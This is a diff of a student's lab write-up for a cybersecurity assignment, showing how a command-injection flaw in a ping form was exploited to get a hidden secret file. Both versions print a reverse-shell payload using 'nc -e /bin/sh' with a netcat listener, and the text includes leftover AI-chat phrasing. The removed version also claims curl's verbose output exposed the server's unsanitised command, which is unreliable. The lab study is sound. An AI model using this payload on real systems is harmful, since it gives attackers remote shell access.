santiagosayshey/DigiBrain/content/Computer Science/Cybersecurity Fundamentals/Assignments/Assignment 4 - Network Attacks & Web Security.md

 >
 > ![[Pasted image 20240502052455.png]]

-Absolutely, you can use `curl` instead of Burp Suite for intercepting and modifying requests.
-Here's the revised explanation:
+You're absolutely right, and I appreciate your patience.
+Let's correct that.
+Here's the revised callout:

 > [!exercise]+ Exercise 6
 > Go to `http://<Your Hacklab VM IP addr>:8083/doa.php` to get the secret!
 >
 > **My Process:**
 >
-> Upon visiting the page, I noticed a form allowing me to check if a host is dead or alive by entering an IP address.
-Suspecting a possible vulnerability, I decided to investigate further.
+> Suspecting a command injection vulnerability, I navigated to the webpage allowing me to check if a host is dead or alive by entering an IP address.
 >
-> I used `curl` to send a request to the page, providing a sample IP address.
-Then, I intercepted the request using `curl`'s verbose mode (`-v`) and redirected the output to a file for analysis:
+> Before attempting to exploit the suspected vulnerability, I set up a netcat listener on my local machine using:
 >
-> ```bash
-> curl -v -d "ip=8.8.8.8" http://<192.168.56.113>:8083/doa.php > request.txt
 > ```
+> nc -lvp 1234
+> ```
 >
-> By examining the contents of `request.txt`, I discovered that the IP address was directly passed to a system command without proper sanitization, indicating a potential command injection vulnerability.
+> With the listener in place, I crafted a malicious command instead of a regular IP address.
+I entered:
 >
-> To confirm my suspicion, I injected a malicious command into the IP address field using `curl`:
->
 > ```
-> curl -d "ip=127.0.0.1 & nc -e /bin/sh 192.168.117.124 1234" http://<\Your Hacklab VM IP addr>:8083/doa.php
+> 127.0.0.1 & nc -e /bin/sh 192.168.117.124 1234
 > ```
 >
-> This command instructed the server to execute a reverse shell, connecting back to my local machine on port 1234.
-Upon executing the `curl` command, I successfully gained a reverse shell connection.
+> This command instructed the server to establish a reverse shell connection to my local machine on port 1234.
 >
-> Once inside the reverse shell, I explored the filesystem to find more information.
-I examined the contents of `doa.php` to understand the functionality of the page and looked for any hints or clues.
+> After setting up the listener, I submitted the form with the injected command and awaited the connection on my local machine.
 >
-> Next, I used the `ls` command with the `-a` flag to list all files, including hidden ones.
-This revealed the presence of a hidden file named `.the_secret_file`.
+> Upon successful exploitation of the vulnerability, I gained a reverse shell connection to the server.
 >
-> Finally, I displayed the contents of the secret file using the `cat` command:
+> Inside the reverse shell, I navigated the filesystem to locate the secret file.
+Discovering `.the_secret_file`, I used the `cat` command to reveal its contents:
 >
 > ```
 > cat .the_secret_file